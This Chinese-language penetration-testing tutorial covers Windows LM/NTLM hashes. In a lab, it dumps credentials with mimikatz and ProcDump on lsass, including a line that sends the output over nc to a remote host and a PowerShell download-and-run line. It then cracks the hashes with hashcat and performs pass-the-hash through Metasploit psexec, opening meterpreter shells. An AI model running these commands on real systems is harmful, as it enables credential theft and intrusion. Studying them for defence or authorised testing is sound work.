Windows用户密码的加密与破解利用

wholesome

声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，雷神众测以及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经雷神众测允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。
前言
在研究 Hashcat 的时候涉及到了 Windows 的Hash破解，感觉这个地方还是有一些姿势点和细节的，特写此文章记录之。
No.1

Hash简介
Hash 一般翻译为“散列”，也可直接音译为“哈希”的。这个加密函数对一个任意长度的字符串数据进行一次加密函数运算，然后返回一个固定长度的字符串。Hash主要用于信息安全领域中加密算法，渗透测试中获取目标系统的明文或Hash往往是整个渗透测试过程中重要的一环。在Windows系统中本机用户的密码Hash是放在本地的SAM文件里面，域内用户的密码Hash是存在域控的NTDS.DIT文件里面。
No.2

Windows Hash分类
LM
LM Hash简介
LAN Manager（LM）哈希是Windows系统所用的第一种密码哈希算法，是一种较古老的Hash，在LAN Manager协议中使用，非常容易通过暴力破解获取明文凭据。它只有唯一一个版本且一直用到了NT LAN Manager（NTLM）哈希的出现，在Windows Vista/Windows 7/Windows Server 2008以及后面的系统中，LM哈希算法是默认关闭的，LM算法是在DES基础上实现的，不区分字母大小写。
LM Hash生成原理
1.用户的密码转换为大写，密码转换为16进制字符串，不足14字节将会用0来再后面补全。
2.密码的16进制字符串被分成两个7byte部分。每部分转换成比特流，并且长度位56bit，长度不足使用0在左边补齐长度
3.再分7bit为一组,每组末尾加0，再组成一组
4.上步骤得到的二组，分别作为key 为 KGS!@# $%进行DES加密。
5.将加密后的两组拼接在一起，得到最终LM HASH值。
LM Hash缺点
1.密码长度最大只能为14个字符
2.密码不区分大小写
3.如果密码强度是小于7位，那么第二个分组加密后的结果肯定是aad3b435b51404ee
4.Des密码强度不高
NTLM
NTLM Hash简介
NT LAN Manager（NTLM）哈希是Windows系统认可的另一种算法，用于替代古老的LM-Hash，一般指Windows系统下Security Account Manager（SAM）中保存的用户密码hash，在Windows Vista/Windows 7/Windows Server 2008以及后面的系统中，NTLM哈希算法是默认启用的。
NTLM Hash生成原理
1.先将用户密码转换为十六进制格式。
2.将十六进制格式的密码进行Unicode编码。
3.使用MD4摘要算法对Unicode编码数据进行Hash计算

1. python2 -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "P@ssw0rd".encode("utf-16le")).digest())'
   
2. 
   
3. e19ccf75ee54e06b06a5907af13cef42

复制代码

No.3

Windows Hash抓取
mimikatz
​
项目地址：
https://github.com/gentilkiwi/mimikatz
Mimikatz是一个开源的项目，用于Windows下读取已经登录过的用户Hash和明文密码，要顺利的读取密码必须具有Admin或者System权限，所以它也是内网渗透神器之一。
本地交互式抓取
运行mimikatz.exe，弹出mimikatz的窗口，输入如下命令：
显示您是否具有适当的权限来继续:
mimikatz # privilege::debug
启动日志记录功能:
mimikatz # log
输出存储在此计算机上的所有明文密码:
mimikatz # sekurlsa::logonpasswords
此时会在当前shell运行的目录下生成mimikatz.log，这里面记录了抓取密码的一些详细情况。
本地非交互式抓取
在高权限的CMD命令行下直接运行：
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > mimikatz.txt
此时会在当前shell运行的目录下生成mimikatz.txt，这里面记录了抓取密码的一些详细情况。
远程非交互式抓取
实验环境
​
本次实验使用ncat来做消息反弹，不知道ncat命令的同学可以参考我的这篇文章：nc命令学习记录
(https://www.sqlsec.com/2019/10/nc.html)
macOS
macOS本机提前做好监听:
ncat -lvp 2333
我本人更喜欢ncat命令多一点，具体看个人喜好。
Windows
这里为了方便我把nc.exe上传到了mimikatz.exe的同目录下了：

1. C:\mimikatz_trunk\x64>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit | nc -v 10.211.55.2 2333
   
2. 
   
3. DNS fwd/rev mismatch: GG != GG.lan
   
4. GG [10.211.55.2] 2333 (?) open

复制代码

效果
这样操作完成后，即不在目标系统上留下任何文件，直接把抓取到的结果用nc发送到指定的远程机，此时macOS这边已经拿到返回的密码信息了：
​
powershell加载mimikatz抓取
目标机器可以连接外网的情况下：

1. powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

复制代码

内网的情况下可将脚本下载下来，自己搭建一个本地的Web服务器，通过内网IP去访问：

1. powershell IEX (New-Object Net.WebClient).DownloadString('http://10.211.55.2/Invoke-Mimikatz.ps1'); Invoke-Mimikatz

复制代码

各个系统版本的抓取样本
Windows Server 2003 R2

1. Authentication Id : 0 ; 420302 (00000000:000669ce)
   
2. 
   
3. Session           : Interactive from 0
   
4. 
   
5. User Name         : Administrator
   
6. 
   
7. Domain            : GG6043
   
8. 
   
9. Logon Server      : GG6043
   
10. 
    
11. Logon Time        : 2019-11-18 20:51:21
    
12. 
    
13. SID               : S-1-5-21-3664143716-1376148344-336540569-500
    
14. 
    
15.     msv :
    
16. 
    
17.     [00000002] Primary
    
18. 
    
19.     * Username : Administrator
    
20. 
    
21.     * Domain   : GG6043
    
22. 
    
23.     * LM       : 896108c0bbf35b5caad3b435b51404ee
    
24. 
    
25.     * NTLM     : f6502cbe4802f94ab472288970c124cd
    
26. 
    
27.     * SHA1     : 669c9b60b44e10aaa8784563c9a5381c9300235a
    
28. 
    
29.     wdigest :
    
30. 
    
31.     * Username : Administrator
    
32. 
    
33.     * Domain   : GG6043
    
34. 
    
35.     * Password : P@ss123
    
36. 
    
37.     kerberos :
    
38. 
    
39.     * Username : Administrator
    
40. 
    
41.     * Domain   : GG6043
    
42. 
    
43.     * Password : P@ss123
    
44. 
    
45.     ssp :
    
46. 
    
47.     credman :

复制代码

主要有如下的关键信息：
​
Windows Server 2008 R2

1. Authentication Id : 0 ; 224455 (00000000:00036cc7)
   
2. Session           : Interactive from 2
   
3. User Name         : Administrator
   
4. Domain            : GGF140
   
5. Logon Server      : GGF140
   
6. Logon Time        : 2019/11/18 23:32:08
   
7. SID               : S-1-5-21-3111474477-815050075-712084324-500
   
8.        msv :
   
9.         [00000003] Primary
   
10.         * Username : Administrator
    
11.         * Domain   : GGF140
    
12.         * LM       : 921988ba001dc8e14a3b108f3fa6cb6d
    
13.         * NTLM     : e19ccf75ee54e06b06a5907af13cef42
    
14.         * SHA1     : 9131834cf4378828626b1beccaa5dea2c46f9b63
    
15.        tspkg :
    
16.         * Username : Administrator
    
17.         * Domain   : GGF140
    
18.         * Password : P@ssw0rd
    
19.        wdigest :
    
20.         * Username : Administrator
    
21.         * Domain   : GGF140
    
22.         * Password : P@ssw0rd
    
23.        kerberos :
    
24.         * Username : Administrator
    
25.         * Domain   : GGF140
    
26.         * Password : P@ssw0rd
    
27.        ssp :
    
28.        credman :

复制代码

Windows Server 2008 R2 默认的配置还是可以读取到LM类型的Hash的，与网上的理论不符合，说明WIndows Server 2008 R2 与Windows 7 依然没有完全禁用掉LM类型的Hash
Windows 7 SP1

1. Authentication Id : 0 ; 2006207 (00000000:001e9cbf)
   
2. Session           : Interactive from 2
   
3. User Name         : Administrator
   
4. Domain            : GG37BE
   
5. Logon Server      : GG37BE
   
6. Logon Time        : 2019/11/18 22:36:13
   
7. SID               : S-1-5-21-1996198258-1617865379-4184567355-500
   
8.     msv :
   
9.     [00000003] Primary
   
10.     * Username : Administrator
    
11.     * Domain   : GG37BE
    
12.     * LM       : 921988ba001dc8e14a3b108f3fa6cb6d
    
13.     * NTLM     : e19ccf75ee54e06b06a5907af13cef42
    
14.     * SHA1     : 9131834cf4378828626b1beccaa5dea2c46f9b63
    
15.     tspkg :
    
16.     * Username : Administrator
    
17.     * Domain   : GG37BE
    
18.     * Password : P@ssw0rd
    
19.     wdigest :
    
20.     * Username : Administrator
    
21.     * Domain   : GG37BE
    
22.     * Password : P@ssw0rd
    
23.     kerberos :
    
24.     * Username : Administrator
    
25.     * Domain   : GG37BE
    
26.     * Password : P@ssw0rd
    
27.     ssp :
    
28.     credman :

复制代码

主要有如下的关键信息：
​
Windows 10 1903

1. Authentication Id : 0 ; 86025756 (00000000:0520a61c)
   
2. Session           : Interactive from 9
   
3. User Name         : sqlsec
   
4. Domain            : MACBOOKPRO
   
5. Logon Server      : MACBOOKPRO
   
6. Logon Time        : 2019/11/18 20:06:24
   
7. SID               : S-1-5-21-2097287409-4065191294-224695044-1000
   
8.        msv :
   
9.         [00000003] Primary
   
10.         * Username : sqlsec
    
11.         * Domain   : MACBOOKPRO
    
12.         * NTLM     : f00a25418f128daaef2bc89ed94416bd
    
13.         * SHA1     : 56d7741bca89552362fd24d11bb8980e3d8a444c
    
14.        tspkg :
    
15.        wdigest :
    
16.         * Username : sqlsec
    
17.         * Domain   : MACBOOKPRO
    
18.         * Password : (null)
    
19.        kerberos :
    
20.         * Username : sqlsec
    
21.         * Domain   : MACBOOKPRO
    
22.         * Password : (null)
    
23.        ssp :
    
24.        credman :

复制代码

主要有如下的关键信息：
​
Windows 10无法使用mimikatz读取到明文密码，只能直接读取到加密后的NTLM值。
ProcDump + mimikatz
​
官网地址：ProcDump v9.0
https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
ProcDump是一个命令行程序，可以很方便地将系统正在运行的进程转存储生成为dump文件又因为是微软自家出品，所以可以过很多杀软。
dump lsass.exe进程
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
x86 x64 分别执行对应的可执行文件 因为本次测试系统为 64位 故执行 procdump64.exe
此时会在当前shell运行的目录下生成lsass.dmp，这个是lsass.exe进程转存储的文件，里面记录了Hash信息。
对于NT6及其以上的系统也可以使用Windows自带的功能进行dump:
任务管理器点击显示所有用户的进程，然后找到 lsass.exe的进程，右键，选择创建转存储文件
​
读取dmp文件信息
将上面转存储生成的lsass.dmp文件放到mimikatz.exe的同目录下，执行下面非交互命令可以直接读取密码：
# 直接读取明文密码
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::tspkg" exit

# 读取明文密码 + Hash值 信息更全
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit
QuarksPwDump
​
QuarksPwDump是一个Win32环境下系统授权信息导出工具，支持Windows众多的OS版本：XP/2003/Vista/7/2008/8 (Windows10 国光测试失败 并没有成功读取到Hash)
项目地址：
https://github.com/quarkslab/quarkspwdump
目前作者只是开源了源代码，没有发布已经编译好的版本，所以大家使用的话得寄几用VS Studio编译一下。下面国光本人自己编译好的版本如下，有需要的朋友可以自行下载：

文件名：QuarksPwDump.exe
下载地址：
https://uijay-my.sharepoint.com/ ... sD32XNmbyQ?e=7nAXHn

如果要自行加入免杀功能的话，大家自行去编译，这里国光用的是VS Studio 2010编译的，顺便附上下载地址：

文件名：VC++2010学习版和永久使用注册码.zip
下载地址：OneDriver下载链接
https://uijay-my.sharepoint.com/ ... 3t9e69KxcQ?e=zecfJu)

另外Githun还有其他大牛已经编译好了更新的版本，我们也可以直接下载：
https://github.com/redcanari/quarkspwdump/releases
这个新的 QuarksPwDumpv_0.3a版本中新增了-sf参数
QuarksPwDump抓取密码的命令如下:

1. QuarksPwDump.exe -dhl -o hash.txt

复制代码

抓取Hash并在同目录下生成hash.txt文件，抓取到具体的Hash如下：

1. Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
   
2. Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42:::

复制代码

提取Administrator用户的关键密码信息为：E19CCF75EE54E06B06A5907AF13CEF42，他实际上是P@ssw0rd的NTLM加密的值，可以用Hashcat来进行破解
No.4

HashWindows Hash利用简介
Hashcat破解
拿到LM或者NTLM的密文时，如果没有明文的时候，最直接的方法当然是直接将其解密啦，这里使用Hashcat来进行密码解密，对Hashcat这个工具不了解的同学可以参考我写的这篇文章：Hashcat学习记录
https://www.sqlsec.com/2019/10/hashcat.html
假设我们读取到Hash如下：
• LM : 921988ba001dc8e14a3b108f3fa6cb6d
• NTLM : e19ccf75ee54e06b06a5907af13cef42
实际上这个明文是：P@ssw0rd
下面用Hashcat来简单演示一下破解，这里破解我使用了-a 0字典破解，hashcat --help可以看到LM和NTLM对应的hash编号分别为3000和1000
3000 | LM                                               | Operating Systems
1000 | NTLM                                             | Operating Systems
废话不多说，下面直接走个流程破解一下吧：
Hashcat破解LM Hash
hashcat -a 0 -m 3000 --force '921988ba001dc8e14a3b108f3fa6cb6d' password.txt
因为LM Hash长度最长是14个字符，密码被分成2个长度为7的字符进行存放，所以这里Hashcat破解的时候也是分2半部分来分别进行破解的：

1. 4a3b108f3fa6cb6d:D
   
2. 921988ba001dc8e1:P@SSW0R
   
3. 
   
4. Session..........: hashcat
   
5. Status...........: Cracked
   
6. Hash.Type........: LM
   
7. Hash.Target......: 921988ba001dc8e1, 4a3b108f3fa6cb6d
   
8. Time.Started.....: Tue Nov 19 00:05:18 2019 (0 secs)
   
9. Time.Estimated...: Tue Nov 19 00:05:18 2019 (0 secs)
   
10. Guess.Base.......: File (password.txt)
    
11. Guess.Queue......: 1/1 (100.00%)
    
12. Speed.# 2.........:     1291 H/s (0.16ms) @ Accel:32 Loops:1 Thr:64 Vec:1
    
13. Speed.# 3.........:        0 H/s (0.00ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
    
14. Speed.# *.........:     1291 H/s
    
15. Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
    
16. Progress.........: 8/8 (100.00%)
    
17. Rejected.........: 0/8 (0.00%)
    
18. Restore.Point....: 0/8 (0.00%)
    
19. Restore.Sub.# 2...: Salt:0 Amplifier:0-1 Iteration:0-1
    
20. Restore.Sub.# 3...: Salt:0 Amplifier:0-0 Iteration:0-1
    
21. Candidates.# 2....: ADMIN -> D
    
22. Candidates.# 3....: [Copying]

复制代码

可以看到先破解出了：D，然后破解出了P@SSW0 比较蛋疼的是 LM Hash不区分大小写，所以我们还得凭感觉去猜出具体的密码。
Hashcat破解NTLM Hash

1. hashcat -a 0 -m 1000 --force 'e19ccf75ee54e06b06a5907af13cef42' password.txt
   
2. 
   
3. 破解成功，得到如下结果：
   
4. 
   
5. e19ccf75ee54e06b06a5907af13cef42:P@ssw0rd
   
6. 
   
7. Session..........: hashcat
   
8. Status...........: Cracked
   
9. Hash.Type........: NTLM
   
10. Hash.Target......: e19ccf75ee54e06b06a5907af13cef42
    
11. Time.Started.....: Mon Nov 18 23:44:55 2019 (0 secs)
    
12. Time.Estimated...: Mon Nov 18 23:44:55 2019 (0 secs)
    
13. Guess.Base.......: File (password.txt)
    
14. Guess.Queue......: 1/1 (100.00%)
    
15. Speed.# 2.........:        0 H/s (0.00ms) @ Accel:64 Loops:1 Thr:64 Vec:1
    
16. Speed.# 3.........:      985 H/s (0.06ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
    
17. Speed.# *.........:      985 H/s
    
18. Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
    
19. Progress.........: 5/5 (100.00%)
    
20. Rejected.........: 0/5 (0.00%)
    
21. Restore.Point....: 0/5 (0.00%)
    
22. Restore.Sub.# 2...: Salt:0 Amplifier:0-0 Iteration:0-1
    
23. Restore.Sub.# 3...: Salt:0 Amplifier:0-1 Iteration:0-1
    
24. Candidates.# 2....: [Copying]
    
25. Candidates.# 3....: admin -> P@ssw0rd

复制代码

在线Hash破解
Objectif Sécurité - Ophcrack
https://www.objectif-securite.ch/ophcrack
一个国外的老牌Hash破解网站，填入NTLM Hash值即可：
​
CMD5.com
https://cmd5.com
国内的CMD5.com 也支持NTLM类型的Hash破解，直接粘贴进去系统会自动解密，也是比较方便的:
​
还有其他很多的在线网站就不推荐了，这里就只列举这两个用的比较多的网站
Hash传递
简介
PASS THE Hash也叫Hash传递攻击,简称PTH。模拟用户登录不需要用户明文密码只需要就可以直接用获取到的Hash来登录目标系统。
利用成功的前提条件是：
• 开启445端口 SMB服务
• 开启admin$共享
这里目标Windows Server 2008 R2（10.211.55.4）通过mimikatz抓取到的Administrator用户的Hash为：
* LM       : 921988ba001dc8e14a3b108f3fa6cb6d
* NTLM     : e19ccf75ee54e06b06a5907af13cef42
通过QuarksDump抓取到的Administrator用户的Hash为：
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42:::
经过国光测试，在下面Hash传递的时候，只要后面的NTLM Hash是正确的，前面填写什么都是可以顺利登陆成功的，经过测试，如下Hash可以成功：

1. AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
   
2. 921988ba001dc8e14a3b108f3fa6cb6d:E19CCF75EE54E06B06A5907AF13CEF42
   
3. 00000000000000000000000000000000:E19CCF75EE54E06B06A5907AF13CEF42
   
4. 66666666666666666666666666666666:E19CCF75EE54E06B06A5907AF13CEF42

复制代码

也就是说:
E19CCF75EE54E06B06A5907AF13CEF42部分起到关键的认证作用，前面的只要位数正确，填写啥都没有问题。下面是具体的演示。
Metasploit
Metasploit下面有3个psexec模块都可以进行Hash传递利用，他们分别是：
# 执行单个命令的PTH模块auxiliary/admin/smb/psexec_command

# 执行直接就获取到meterpreter的PTH模块exploit/windows/smb/psexec

# 支持对一个网段进行PTH进行验证的模块exploit/windows/smb/psexec_psh
auxiliary/admin/smb/psexec_command

1. msf5 > use auxiliary/admin/smb/psexec_command
   
2. msf5 auxiliary(admin/smb/psexec_command) > set rhosts 10.211.55.14
   
3. rhosts => 10.211.55.14
   
4. msf5 auxiliary(admin/smb/psexec_command) > set smbuser administrator
   
5. smbuser => administrator
   
6. msf5 auxiliary(admin/smb/psexec_command) > set smbpass AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
   
7. smbpass => AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
   
8. msf5 auxiliary(admin/smb/psexec_command) > set command "whoami"command => whoami
   
9. msf5 auxiliary(admin/smb/psexec_command) > run
   
10. 
    
11. [+] 10.211.55.14:445      - Service start timed out, OK if running a command or non-service executable...
    
12. [*] 10.211.55.14:445      - checking if the file is unlocked
    
13. [*] 10.211.55.14:445      - Getting the command output...
    
14. [*] 10.211.55.14:445      - Executing cleanup...
    
15. [+] 10.211.55.14:445      - Cleanup was successful
    
16. [+] 10.211.55.14:445      - Command completed successfully!
    
17. [*] 10.211.55.14:445      - Output for "whoami":
    
18. 
    
19. nt authority\system
    
20. 
    
21. 
    
22. [*] 10.211.55.14:445      - Scanned 1 of 1 hosts (100% complete)
    
23. [*] Auxiliary module execution completed

复制代码

比较鸡肋的是，这个模块不支持网段格式批量验证，所以实战中可以考虑下面两个模块
exploit/windows/smb/psexec
支持网段格式的IP，方便批量验证PTH，下面是单个验证过程：

1. msf5 > use exploit/windows/smb/psexec
   
2. msf5 exploit(windows/smb/psexec) > set rhosts 10.211.55.14
   
3. rhosts => 10.211.55.14
   
4. msf5 exploit(windows/smb/psexec) > set smbuser administrator
   
5. smbuser => administrator
   
6. msf5 exploit(windows/smb/psexec) > set smbpass AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
   
7. smbpass => AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
   
8. msf5 exploit(windows/smb/psexec) > set lhost 10.211.55.4
   
9. lhost => 10.211.55.4
   
10. msf5 exploit(windows/smb/psexec) > run
    
11. 
    
12. [*] Started reverse TCP handler on 10.211.55.4:4444
    
13. [*] 10.211.55.14:445 - Connecting to the server...
    
14. [*] 10.211.55.14:445 - Authenticating to 10.211.55.14:445 as user 'administrator'...
    
15. [*] 10.211.55.14:445 - Selecting PowerShell target
    
16. [*] 10.211.55.14:445 - Executing the payload...
    
17. [+] 10.211.55.14:445 - Service start timed out, OK if running a command or non-service executable...
    
18. [*] Sending stage (179779 bytes) to 10.211.55.14
    
19. [*] Meterpreter session 2 opened (10.211.55.4:4444 -> 10.211.55.14:49168) at 2019-11-24 23:42:38 +0800
    
20. 
    
21. meterpreter >

复制代码

下面网段批量验证效果，在内网当做这样验证还是比较实用高效的：
​
关于前面32位的Hash不起作用的疑问，去T00ls论坛提问了，下面是师傅们的解答：
iceword：前面是lm hash，lm hash已经被弃用了，不用来验证，所以添啥都行
Hello_C：NTLM Hash = LM Hash + NT Hash，LM Hash是aad3b435b51404eeaad3b435b51404ee时，可能密码为空或者没有存储lm hash，2008默认不存储lm hash。pth 用nt hash，有些工具可能需要lm hash:nt hash格式，没有lm hash可以使用任意32个字符填充。
安全客：如果空密码或者不储蓄LM Hash的话，我们抓到的LM Hash是AAD3B435B51404EEAAD3B435B51404EE。所以在win7 中我们看到抓到LM Hash都是AAD3B435B51404EEAAD3B435B51404EE，这里的LM Hash并没有价值。
exploit/windows/smb/psexec_psh

1. msf5 > use exploit/windows/smb/psexec_psh
   
2. msf5 exploit(windows/smb/psexec_psh) > set rhosts 10.211.55.14
   
3. rhosts => 10.211.55.14
   
4. msf5 exploit(windows/smb/psexec_psh) > set smbuser administrator
   
5. smbuser => administrator
   
6. msf5 exploit(windows/smb/psexec_psh) > set smbpass AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
   
7. smbpass => AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
   
8. msf5 exploit(windows/smb/psexec_psh) > set lhost 10.211.55.4
   
9. lhost => 10.211.55.4
   
10. msf5 exploit(windows/smb/psexec_psh) > run
    
11. 
    
12. [*] Started reverse TCP handler on 10.211.55.4:4444
    
13. [*] 10.211.55.14:445 - Executing the payload...
    
14. [+] 10.211.55.14:445 - Service start timed out, OK if running a command or non-service executable...
    
15. [*] Sending stage (179779 bytes) to 10.211.55.14
    
16. [*] Meterpreter session 3 opened (10.211.55.4:4444 -> 10.211.55.14:49169) at 2019-11-24 23:44:12 +0800
    
17. meterpreter >
    

复制代码

这个模块也支持网段批量验证，这里就不再赘述了。
No.5

参考资料
几种windows本地hash值获取和破解详解
https://www.secpulse.com/archives/65256.html

抓取 Windows 用户或者域用户 hash 的多种姿势
https://s.yl0.org/2018/10/18/%E6%8A%93hash.html

mimikatz 用法小记 [ 非交互抓取本地密码明文及hash ]
https://klionsec.github.io/2016/07/23/mimikatz-one/

利用procdump+Mimikatz 绕过杀软获取Windows明文密码
http://www.91ri.org/6881.html

Windows密码抓取总结
https://times0ng.github.io/2018/04/20/Windows密码抓取总结/

关于系统密码抓取
https://www.cnblogs.com/zhaijiahui/p/8994482.html

后渗透之meterpreter使用攻略
https://xz.aliyun.com/t/2536

Windows内网协议学习NTLM篇之NTLM基础介绍
https://www.anquanke.com/post/id/193149